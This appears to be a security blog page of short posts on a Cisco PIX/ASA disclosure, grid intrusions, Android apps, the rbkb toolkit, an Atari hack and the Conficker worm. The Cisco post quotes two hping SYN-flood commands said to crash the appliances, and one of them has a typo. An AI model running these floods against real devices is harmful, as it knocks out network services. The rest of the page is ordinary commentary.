Some fairly critical issues disclosed on a very popular security product.

Cisco PIX Security Appliance and ASA 5500 Series Adaptive Security Appliance are prone to multiple denial-of-service vulnerabilities, an ACL-bypass vulnerability, and an authentication-bypass vulnerability.

Read More Here …
An attacker can use readily available network utilities to exploit these issues.
The following example data is sufficient to exploit the denial-of-service issue affecting PIX and ASA:

/*Utilize 1550 blocks on an ASA to trigger a crash...*/
hping --fast -p 22 -w 1518 -S -d 1480 -a 10.22.1.1 10.22.1.2

/* Trigger the vuln a bit faster */
hping --fast -p 22 -w 1518 -S -d 26201 .a 10.22.1.1 10.22.1.2

Never before has a presidential candidate used technology in the way the Obama administration did during the past elections. From Youtube, to twitter tweets sent from him trusty Blackberry. Obama definitely leveraged his technilogical savvy in his favor. So then why after more than a handful of months into his term has he still not chosen a CTO for the nation? Is it due to lack of competent technology folks? Maybe he feels it is not as important as say visiting the Tonight show? Or maybe he wants to assume the responsibilities himself on the weekends and in his spare time? Techcrunch is running a poll on this very question. So take the time and head on over and share your input on this question. In a world of increasing threats to our IT infrastructure you would figure this role should be filled soon…

Read More Here …

This is not the first time we have mentioned the rise of computer security related crimes or pointed out the hacking of or weaknesses of many critical metropolitan infrastructures. With that said the recent hacking events first mentioned over the past weekend does again cast a big bright light on how living in our ‘digital age’ can also be our Achilles heel. Remember the East Coast Power Outage of 2007? No airports, emergency services, traffic & street lights, mobile phones, or other critical services.. Now picture that on a slightly larger scale, and you begin to understand how important events like this can be to not only us IT security folks but to the society as a whole.

The intruders, who came from countries including China and Russia, were believed to be attempting to map the US electrical system and work out how it was controlled…
…..Authorities investigating the intrusions have found software tools left behind that could be used to destroy infrastructure components, the senior intelligence official said. He added, “If we go to war with them, they will try to turn them on.

Read More Here …

Really this needs no introduction more than this video can provide!

One of the first products of the Android Bounty program hosted by Androidandme this not only blows the iPhone’s torrent (download to local storage) program out of the water but just shows the power of open source!
And to think the bounty the developer earned for this was about $90.. So when you see the 2.99 price tag for the app on the market keep this in mind

Read more Here!

It was in 2006 that the language known as RUBY was fully accepted as a standard language. The self described “open source programming language with a focus on simplicity and productivity” is one of the more powerful languages in use today. The folks over at Matasano Security (not affiliated with “matz” Y.Matsumoto the creator of RUBY) have announced the release of ‘rbkb’ or The Ruby Black Bag.

‘rbkb’ is an ever growing collection of reversing and pen-testing related ruby libraries and tools I’ve been using and evolving for a long time now.

Head on over to their site to read more.

While the concept is pretty clear the development team is having some issue with resources ($$). You can read more about the concept first shown in the Android Dev Challenge at Androidandme.com. You can also show your support for the dev team by voting for them to help get some funding here.

I am pretty excited to see this project mature and release a workable version. In my opinion this would pretty much be cake for Android security which is already is ahead of the pack in this field.

As an avid user of the Google Phone, and someone who LOVES the Android OS. We have added a new section to the site “LSYiPDT” or Let’s see your iPhone do this. Now it would be easy to point out the obvious tasks like run background apps, cut/paste, scan barcodes, last longer than 24hrs w/o a recharge, or not monopolized by AT&(I will feed your private info to the US government)T . But to prevent fan-boy flamage we will try to stick with the more advanced tasks that really set Android apart from the whack…err..pack.

Those cool guys at Hack-A-Day have a fun article on how to hack your old atari system to make it S-Video compatible thus making it actually usable without that old TV slider switch. I think this will be a good reference to perform a similar hack on my ancient Tandy PC that I really want to see boot up again. Wonder what I can get to run on this old Tandy to make it useful again, and where did I put all those old Floppy disks and program cartridges?

Read More on the S-Video hack here

As posted in the “Waiting for the Worms” article below the conflicker worm was MIA on April 1st along with all the Gloom N Doom forecasted by the IT security industry. There is an interesting article posted by SearchSecurity.com that talks about not only possible reasons for the fizzle of the worm but also the impact these “Crying Wolf” scenario’s can have on the security industry. Will we get to a point where these warning will be ignored? Is that maybe the intention of some of these skilled attackers? How about end users who could of patched this 6 months back but still may have not until something as hyped as this? .. Many good questions still to be answered.

Read More Here

Unified threat management (UTM) is a promising approach to consolidating security controls, including firewalls, intrusion prevention, anti-virus, content filtering, and reporting.

Read More Here